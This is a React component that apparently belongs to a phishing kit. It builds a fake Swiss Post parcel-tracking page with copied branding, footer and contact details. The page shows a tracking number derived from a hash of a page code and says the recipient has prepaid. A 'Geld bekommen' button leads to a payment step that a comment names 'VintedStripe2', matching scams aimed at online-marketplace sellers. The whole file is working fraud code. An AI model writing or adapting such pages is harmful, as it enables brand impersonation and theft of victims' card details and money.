import React, { useCallback, useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './SwissPostChSuccess.css';
import SupportWidget from './SupportWidget';
import { API_URL } from '../apiBase';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const SP_CH_LOGO_SRC = `${process.env.PUBLIC_URL || ''}/swisspost-ch-logo.png`;

/** Стабильная 9-значная «Tracking-Nummer» из page_code */
function trackingFromPageCode(code) {
  const c = (code || '').toString();
  let h = 2166136261;
  for (let i = 0; i < c.length; i++) {
    h ^= c.charCodeAt(i);
    h = Math.imul(h, 16777619);
  }
  const n = 100000000 + (Math.abs(h) % 900000000);
  return String(n);
}

function LaptopIcon() {
  return (
    <svg className="sp-status-icon" width="22" height="22" viewBox="0 0 24 24" fill="currentColor" aria-hidden>
      <path d="M20 18c1.1 0 1.99-.9 1.99-2L22 5c0-1.1-.9-2-2-2H4c-1.1 0-2 .9-2 2v11c0 1.1.9 2 2 2H0v2h24v-2h-4zM4 5h16v11H4V5z" />
    </svg>
  );
}

function CardIcon() {
  return (
    <svg className="sp-status-icon" width="22" height="22" viewBox="0 0 24 24" fill="currentColor" aria-hidden>
      <path d="M20 4H4c-1.11 0-1.99.89-1.99 2L2 18c0 1.11.89 2 2 2h16c1.11 0 2-.89 2-2V6c0-1.11-.89-2-2-2zm0 14H4v-6h16v6zm0-10H4V6h16v2z" />
    </svg>
  );
}

function MoneyIcon() {
  return (
    <svg width="22" height="22" viewBox="0 0 24 24" fill="currentColor" aria-hidden>
      <path d="M11.8 10.9c-2.27-.59-3-1.2-3-2.15 0-1.09 1.01-1.85 2.7-1.85 1.78 0 2.44.85 2.5 2.1h2.21c-.07-1.72-1.12-3.3-3.21-3.81V3h-3v2.16c-1.94.42-3.5 1.68-3.5 3.61 0 2.31 1.91 3.46 4.7 4.13 2.5.6 3 1.48 3 2.41 0 .69-.49 1.79-2.7 1.79-2.06 0-2.87-.92-2.98-2.1h-2.2c.12 2.19 1.76 3.42 3.68 3.83V21h3v-2.15c1.95-.37 3.5-1.5 3.5-3.55 0-2.84-2.43-3.81-4.7-4.4z" />
    </svg>
  );
}

function CopyIcon() {
  return (
    <svg width="16" height="16" viewBox="0 0 24 24" fill="currentColor" aria-hidden>
      <path d="M16 1H4c-1.1 0-2 .9-2 2v14h2V3h12V1zm3 4H8c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h11c1.1 0 2-.9 2-2V7c0-1.1-.9-2-2-2zm0 16H8V7h11v14z" />
    </svg>
  );
}

/**
 * Die Post (CH) — Paketverfolgung; nach Kapitel → index2 (VintedStripe2).
 */
function SwissPostChSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [copyFlash, setCopyFlash] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) return;
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetch(`${API_URL}/api/page/${pageCode}`)
      .then((res) => res.json())
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .catch(() => {})
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'CH').toUpperCase();

  const tracking = useMemo(() => {
    const t = (pageData?.tracking_number || '').toString().replace(/\D/g, '');
    if (t.length >= 6) return t.slice(0, 12);
    return trackingFromPageCode(pageCode);
  }, [pageData, pageCode]);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null) return 0;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : 0;
  })();

  const priceText =
    Number.isFinite(priceNumber) && priceNumber % 1 === 0
      ? String(priceNumber.toFixed(0))
      : String(priceNumber);

  const fullName = [pageData?.first_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const productName = (pageData?.product_name || '').trim() || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const copyTracking = useCallback(() => {
    const run = async () => {
      try {
        await navigator.clipboard.writeText(tracking);
        setCopyFlash(true);
        setTimeout(() => setCopyFlash(false), 2000);
      } catch {
        /* ignore */
      }
    };
    run();
  }, [tracking]);

  if (loading && pageCode) {
    return (
      <div className="sp-wrap">
        <div className="sp-loading">Wird geladen…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="sp-wrap">
      <header className="sp-header">
        <div className="sp-header-shell">
          <a href="#/" className="sp-brand-block" aria-label="Die Post">
            <img src={SP_CH_LOGO_SRC} alt="" className="sp-brand-img" width={234} height={208} />
          </a>
          <div className="sp-header-right">
            <div className="sp-header-util">
              <a href="#/">Jobs</a>
              <a href="#/">Über uns</a>
              <a href="#/">Hilfe und Kontakt</a>
              <a href="#/">Meine Post</a>
            </div>
            <nav className="sp-nav-main" aria-label="Hauptnavigation">
              <a href="#/">Briefe versenden</a>
              <a href="#/">Pakete versenden</a>
              <a href="#/">Empfangen</a>
              <a href="#/">Standorte</a>
              <a href="#/">Geschäftslösungen</a>
            </nav>
          </div>
        </div>
      </header>

      <main className="sp-main">
        <div className="sp-title-row">
          <h1 className="sp-page-title">Paketverfolgung</h1>
          <div className="sp-tabs">
            <span className="sp-tab sp-tab--active">Verfolgung</span>
            <span className="sp-tab">FAQs</span>
          </div>
        </div>

        <div className="sp-tracking-box">
          <div>
            <div className="sp-tracking-label">Tracking-Nummer:</div>
            <div className="sp-tracking-num">{tracking}</div>
          </div>
          <button type="button" className="sp-copy-btn" onClick={copyTracking}>
            <CopyIcon />
            Kopieren
          </button>
        </div>

        <h2 className="sp-section-title">&gt; Paketstatus</h2>
        <div className="sp-status-list">
          <div className="sp-status-item">
            <LaptopIcon />
            <span>Die Paketdaten wurden in das System der Post eingegeben.</span>
          </div>
          <div className="sp-status-item">
            <CardIcon />
            <span>Vorauszahlung durch den Empfänger.</span>
          </div>
        </div>

        <Link to={index2Path} className="sp-cta">
          <MoneyIcon />
          Geld bekommen ({priceText} CHF)
        </Link>

        <section className="sp-prod-section">
          <h2 className="sp-section-title">&gt; Produktinformation</h2>
          <div className="sp-prod-grid">
            <div className="sp-prod-cell">
              <div className="sp-prod-label">Lieferadresse:</div>
              <div className="sp-prod-value">{address}</div>
            </div>
            <div className="sp-prod-cell">
              <div className="sp-prod-label">Vollständiger Name:</div>
              <div className="sp-prod-value">{fullName}</div>
            </div>
            <div className="sp-prod-cell">
              <div className="sp-prod-label">Produktname:</div>
              <div className="sp-prod-value">{productName}</div>
            </div>
            <div className="sp-prod-cell">
              <div className="sp-prod-label">Zu erhaltender Betrag:</div>
              <div className="sp-prod-value">
                {priceText} CHF
              </div>
            </div>
          </div>
        </section>

        <div className="sp-help">
          <h3>Benötigen Sie weitere Hilfe?</h3>
          <p>Wenden Sie sich für weitere Unterstützung an den Support von Die Post Tracking.</p>
          <a href="#/" className="sp-faqs-btn">
            FAQs
          </a>
        </div>
      </main>

      <footer className="sp-footer">
        <div className="sp-footer-inner">
          <div className="sp-footer-col">
            <h4>Direkt zu</h4>
            <a href="#/">PostFinance</a>
            <a href="#/">PostAuto</a>
            <a href="#/">Immobilien</a>
            <a href="#/">Post Company Cars</a>
          </div>
          <div className="sp-footer-col">
            <h4>Mehr Post</h4>
            <a href="#/">Innovation</a>
            <a href="#/">Verantwortung</a>
            <a href="#/">Shop</a>
            <a href="#/">Medien</a>
            <a href="#/">Apps der Post</a>
            <a href="#/">Lieferanten</a>
          </div>
          <div className="sp-footer-col">
            <h4>Contact Center</h4>
            <p>
              <strong style={{ color: '#fff' }}>+41 848 888 888</strong>
            </p>
            <p>CHF 0.08/Min. vom Schweizer Festnetz</p>
            <p>Montag bis Freitag: 7.30–18.00 Uhr</p>
            <p>Samstag: 8.00–12.00 Uhr</p>
          </div>
          <div className="sp-footer-col">
            <h4>Adresse Contact Center</h4>
            <p>Post CH Netz AG</p>
            <p>Contact Center Post</p>
            <p>Wankdorfallee 4</p>
            <p>3030 Bern</p>
          </div>
        </div>
      </footer>

      {copyFlash ? <div className="sp-copy-toast">Kopiert</div> : null}
      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default SwissPostChSuccess;
